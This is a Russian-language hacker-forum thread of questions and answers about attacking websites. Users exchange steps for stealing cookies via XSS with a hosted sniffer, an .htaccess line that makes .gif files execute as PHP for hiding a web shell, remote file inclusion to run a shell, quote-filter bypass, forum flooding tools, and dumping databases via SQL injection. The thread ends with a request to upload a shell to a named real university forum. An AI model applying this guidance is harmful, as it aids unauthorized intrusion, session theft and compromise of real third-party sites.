Ваши вопросы по уязвимостям.

нужна помощь в xss, пытаюсь изучать, но много непонятных мелочей.
предположим нужная мне xss

насколько я смог понять куки записываются в картику hacknet.gif, т.е у меня должен быть свой сайт с картинкой, которую разрешено изменять на этом сайте без авторизации?или неправильно понял?
Думаю идея вопроса более-менее понятна.
Разъясните мне пожалуйста эти детали

 

нет это просто ссылка на сниффер

 

собственно сам вопрос

ок, где взять этот снифер, как и где его разестить?
---------------------------------------------------------------------
разьясните пожалуйста детали про получение куков

 

_http://forum.antichat.ru/thread18555.html поиском пользоваться не барское дело?
Вот собственно помощ по гринбировскому сниферу
_http://forum.antichat.ru/thread36829.html
все понятно написано

 

Ужс как всё сложно =\
сливаешь http://old.antichat.ru/soft/s.zip, распаковываешь, заливаешь на сервер с поддержкой php, правишь конфиг (если таковой имеется) и всё. вставляешь в скрипт ссылку на сниффер

 

сорри елли не туда
возник вот такой вопрос есть ли вожможность обхода фильтрации ковычки через функцию quote() ?

 

Есть ли другие флуд-проги на форумах (IPB) помимо Antiturk(Denyo Lauch)?
(при отсутствии ограничений содавать много тем либо сообщений)

 

Если создать файл .htaccess и вписать в него следующую строчку:
AddTypeapplication/x-httpd-php gif - то все файлы с gif будут интрепетироваться как php файлы.
Я так и сделал. Создать .htaccess. Вписал в него строку и решил проверить для начала на своем сайте. Закинул, полез, но система выдала предупреждение, что 500 ошибка. Вообщем, файл был недоступен.
Почему? И как это можно исправить?

 

каким образом можно сделать дамп всей базы данных

 

у тя доступ к базе есть или через скуль ?
если есть доступ к базе тогда почти через любой mysql клиент ежели через скуль Тогда попробуй через "SQL Injection Tool"

2Ershik
а в одном посте не судьба написать ?
такую строчку к своему добавь removehandler.gif отменяет настройки по умолчанию для файлов.gif

 

addtype application/x-httpd-php gif

 

Ershik проверь права на чтение если всё норм то смотри топик выше /\
||

 

Доступ к базе есть. подскажи хоть 1 mysql клиент

 

navicat, rst sql

 

m0use
http://forum.antichat.ru/showthread.php?t=51383

 

у меня вопрос по php include,
запрос вида .php?page=http://site.ru/xz.txt? выводит текст файла,почему не запускается shell?

 

потому, что он не воспринимается, как php-файл

 

1.

Потому что это не инклуд а читалка файлов
2.

Мда. Ты админ хакерского форума?
3.

При инклуде любое расширение будет выполняться (пытаться выполниться) как php код.

Это не инклуд

 

спасибо за ответы))

 

Это серьёзно?Можн залить shell?
http://studsovet.ulsu.ru/forum/
Cори если не по теме